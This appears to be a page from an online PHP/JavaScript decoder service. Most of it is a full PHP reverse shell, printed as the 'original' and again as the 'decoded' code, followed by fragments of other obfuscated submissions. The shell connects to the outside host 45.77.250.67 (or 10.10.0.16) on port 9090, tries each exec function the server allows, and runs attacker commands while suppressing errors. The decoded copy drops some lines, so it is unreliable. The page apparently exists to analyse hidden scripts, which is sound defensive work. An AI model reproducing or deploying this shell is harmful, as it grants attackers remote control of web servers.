Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

    /*<?php /**/
      @error_reporting(0);
      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
      $dis=@ini_get('disable_functions');
      if(!empty($dis)){
        $dis=preg_replace('/[, ]+/', ',', $dis);
        $dis=explode(',', $dis);
        $dis=array_map('trim', $dis);
      }else{
        $dis=array();
      }
      
    $ipaddr='10.10.0.16';
    $port=9090;

    if(!function_exists('ByZUEwJ')){
      function ByZUEwJ($c){
        global $dis;
        
      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
        $c=$c." 2>&1\n";
      }
      $KKJMFxY='is_callable';
      $cStJQy='in_array';
      
      if($KKJMFxY('popen')and!$cStJQy('popen',$dis)){
        $fp=popen($c,'r');
        $o=NULL;
        if(is_resource($fp)){
          while(!feof($fp)){
            $o.=fread($fp,1024);
          }
        }
        @pclose($fp);
      }else
      if($KKJMFxY('system')and!$cStJQy('system',$dis)){
        ob_start();
        system($c);
        $o=ob_get_contents();
        ob_end_clean();
      }else
      if($KKJMFxY('exec')and!$cStJQy('exec',$dis)){
        $o=array();
        exec($c,$o);
        $o=join(chr(10),$o).chr(10);
      }else
      if($KKJMFxY('proc_open')and!$cStJQy('proc_open',$dis)){
        $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
        $o=NULL;
        while(!feof($pipes[1])){
          $o.=fread($pipes[1],1024);
        }
        @proc_close($handle);
      }else
      if($KKJMFxY('passthru')and!$cStJQy('passthru',$dis)){
        ob_start();
        passthru($c);
        $o=ob_get_contents();
        ob_end_clean();
      }else
      if($KKJMFxY('shell_exec')and!$cStJQy('shell_exec',$dis)){
        $o=shell_exec($c);
      }else
      {
        $o=0;
      }
    
        return $o;
      }
    }
    $nofuncs='no exec functions';
    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
      $s=@fsockopen("tcp://45.77.250.67",$port);
      while($c=fread($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=ByZUEwJ(substr($c,0,-1));
          if($out===false){
            fwrite($s,$nofuncs);
            break;
          }
        }
        fwrite($s,$out);
      }
      fclose($s);
    }else{
      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
      @socket_connect($s,$ipaddr,$port);
      @socket_write($s,"socket_create");
      while($c=@socket_read($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=ByZUEwJ(substr($c,0,-1));
          if($out===false){
            @socket_write($s,$nofuncs);
            break;
          }
        }
        @socket_write($s,$out,strlen($out));
      }
      @socket_close($s);
    }

Decrypted code:

    /*/**/
      @error_reporting(0);
      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
      $dis=@ini_get('disable_functions');
      if(!empty($dis)){
        $dis=preg_replace('/[, ]+/', ',', $dis);
        $dis=explode(',', $dis);
        $dis=array_map('trim', $dis);
      }else{
        $dis=array();
      }
      
    $ipaddr='10.10.0.16';
    $port=9090;

    if(!function_exists('ByZUEwJ')){
      function ByZUEwJ($c){
        global $dis;
        
      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
        $c=$c." 2>&1\n";
      }
      $KKJMFxY='is_callable';
      $cStJQy='in_array';
      
      if($KKJMFxY('popen')and!$cStJQy('popen',$dis)){
        $fp=popen($c,'r');
        $o=NULL;
        if(is_resource($fp)){
          while(!feof($fp)){
            $o.=fread($fp,1024);
          }
        }
        @pclose($fp);
      }else
      if($KKJMFxY('system')and!$cStJQy('system',$dis)){
        ob_start();
        system($c);
        $o=ob_get_contents();
        
      }else
      if($KKJMFxY('exec')and!$cStJQy('exec',$dis)){
        $o=array();
        exec($c,$o);
        $o=join("
",$o)."
";
      }else
      if($KKJMFxY('proc_open')and!$cStJQy('proc_open',$dis)){
        $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
        $o=NULL;
        while(!feof($pipes[1])){
          $o.=fread($pipes[1],1024);
        }
        @proc_close($handle);
      }else
      if($KKJMFxY('passthru')and!$cStJQy('passthru',$dis)){
        ob_start();
        passthru($c);
        $o=ob_get_contents();
        
      }else
      if($KKJMFxY('shell_exec')and!$cStJQy('shell_exec',$dis)){
        $o=shell_exec($c);
      }else
      {
        $o=0;
      }
    
        return $o;
      }
    }
    $nofuncs='no exec functions';
    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
      $s=@fsockopen("tcp://45.77.250.67",$port);
      while($c=fread($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=ByZUEwJ(substr($c,0,-1));
          if($out===false){
            fwrite($s,$nofuncs);
            break;
          }
        }
        fwrite($s,$out);
      }
      fclose($s);
    }else{
      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
      @socket_connect($s,$ipaddr,$port);
      @socket_write($s,"socket_create");
      while($c=@socket_read($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=ByZUEwJ(substr($c,0,-1));
          if($out===false){
            @socket_write($s,$nofuncs);
            break;
          }
        }
        @socket_write($s,$out,strlen($out));
      }
      @socket_close($s);
    }

Recent submissions:

<?php /**********************************************************************************... $myvariable = call_user_func("strrev", "_____ba"), call_user_func("base64_decode", "YmNgYG... <?php ... \x65\x76\x61\x6C\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x70\x2C\x61\x2C\x63\x2C\x6B\x2C\x...  <script>var wDk = ""; v... \x16\x03\x01\x00\xB1\x01\x00\x00\xAD\x03\x03\x16\x98r\xCEW\x13\x80\x85f;\xCB\x18T\x14V\xD8... {"\u006E\u0061\u006D\u0065\u0073\u0070\u0061\u0063\u0065":"\u0068\u0075\u0064","\u0076\u00... \xe4\xba\x88\xe6\x9c\x9f\xe3\x81\x97\xe3\x81\xaa\xe3\x81\x84\xe3\x82\xa8\xe3\x83\xa9\xe3\x... <?php $cpuZC = "\x29\x9\x32\x2\x5e\x51\x18\xf\x34\x32\x38\x3d\x10" ^ "KhAgheGkQQWYuuUIk";$... // // var _$_f53d=["\x65\x76\x61\x6C\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x70\x2C\x61\...